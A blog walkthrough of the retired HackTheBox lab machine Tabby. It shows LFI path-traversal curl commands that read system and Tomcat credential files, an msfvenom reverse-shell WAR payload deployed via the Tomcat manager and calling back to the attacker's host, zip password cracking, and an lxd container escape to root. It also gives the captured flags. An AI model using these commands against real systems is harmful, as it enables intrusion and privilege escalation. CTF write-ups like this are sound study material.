Hackthebox - Tabby

Inital Enumeration

nmap scan

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
# Nmap 7.80 scan initiated Sun Aug  9 14:17:27 2020 as: nmap -sC -sV -oN nmap/tabby 10.10.10.194
Nmap scan report for 10.10.10.194
Host is up (0.082s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Mega Hosting
8080/tcp open http Apache Tomcat
|_http-title: Apache Tomcat
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Aug 9 14:17:39 2020 -- 1 IP address (1 host up) scanned in 12.07 seconds

Enumerating PORT: 80

Clicking around we only find another link to /news.php which also seem to include a statement.

Possible LFI maybe?

Testing for LFI we see it is indeed vurnable to LFI

1
curl http://10.10.10.194/news.php?file=../../../../etc/passwd

which give us users on the box as

1
2
root
ash

After getting the LFI we need to think what do we need to include

As we have another port lets look at that too

Tomcat PORT:8080

few the message in the page were very interesting like.

1
tomcat9-admin: This package installs two web applications that can help managing this Tomcat instance. Once installed, you can access the manager web-app and the host-manager web-app.

This tell us we have a admin panel (tomcat manager) running but we need credentials for that

and we also see

1
NOTE: For security reasons, using the manager webapp is restricted to users with role "manager-gui". The host-manager webapp is restricted to users with role "admin-gui". Users are defined in /etc/tomcat9/tomcat-users.xml.

Which tell us about some file tomcat-users.xml which may contain our password. but trying that etc/tomcat9/tomcat-users.xml path on our LFI didn’t got us that file.

we know that tomcat is running with CATALINA_HOME in /usr/share/tomcat9 so maybe the file is in that folder?

trying /usr/share/tomcat9/conf/tomcat-users.xml didnot got anything but as we saw from the page Users are defined in /etc/tomcat9/tomcat-users.xml. we can try /usr/share/tomcat9/etc/tomcat-users.xml

with that we can download the tomcat-users.xml file.

1
curl http://10.10.10.194/news.php?file=../../../../usr/share/tomcat9/etc/tomcat-users.xml > tomcat-users.xml

and that contain a credentials

1
2
3
<role rolename="admin-gui"/>
<role rolename="manager-script"/>
<user username="tomcat" password="$3cureP4s5w0rd123!" roles="admin-gui,manager-script"/>

using that we can login to host-manager

I create a milicious war file using msfvenom

1
msfvenom -p java/shell_reverse_tcp lhost=10.10.X.X lport=9001 -f war -o pwn.war

but we don’t see any an option to upload a war going back to the tomcat home we remember that manager-gui role has been removed because of which we are not able to view that manger page.

but as we have admin-gui role maybe we can upload the war some other way

Little GoogleFu landed me on a stack-overflow page.

1
curl -v -u tomcat:'$3cureP4s5w0rd123!' -T ./pwn.war 'http://10.10.10.194:8080/manager/text/deploy?path=/pwn'

and
doing a curl on http://10.10.10.194:8080/pwn gave me a shell as tomcat

Enumerating as user tomcat

Enumerating the tomcat user we find a backup zip in /var/www/html/files so we download it and try to crack the password for that using fcrackzip

using

1
2
fcrackzip -D  -p /usr/share/wordlists/rockyou.txt backup.zip
possible pw found: admin@it ()

which give us the password as admin@it

unzipping the zip we don’t see anything interesting.

not seeing any other way i also tried that password on ash user of the box. which immediately gave me the shell as ash

which gave us the user flag as bcc6922fa15c76baaa1b845cc4d7d72c

Privilege Escalation

running id command

1
2
ash@tabby:~$ id
uid=1000(ash) gid=1000(ash) groups=1000(ash),4(adm),24(cdrom),30(dip),46(plugdev),116(lxd)

we see we are a part of interesting group lxd

googling around i found this article by hackingarticle.in

following the article we can get root

Building the lxc alpine image

1
2
3
git clone  https://github.com/saghul/lxd-alpine-builder.git
cd lxd-alpine-builder
sudo ./build-alpine

This will generate a file as alpine*.tar.gz.

I renamed it to alpine.tar.gz for ease of typing later.

1
2
3
4
5
6
7
8
9
mkdir -p /tmp/.f3v3r
cd /tmp/.f3v3r/
wget http://10.10.X.X/alpine.tar.gz
lxc image import ./alpine.tar.gz --alias f3v3r
lxc init f3v3r ignite -c security.privileged=true
lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
lxc start ignite
lxc exec ignite /bin/sh
chroot /mnt/root

using that we can grab root.txt as 8f2c3651a5fd656ea4dd5ae1922ddcdd

and we have pwned Tabby 💃

Author: Shubham Kumar
Link: https://f3v3r.in/htb/machines/retired/tabby/
Copyright Notice: All articles in this blog are licensed under CC BY-NC-SA 4.0 unless stating additionally.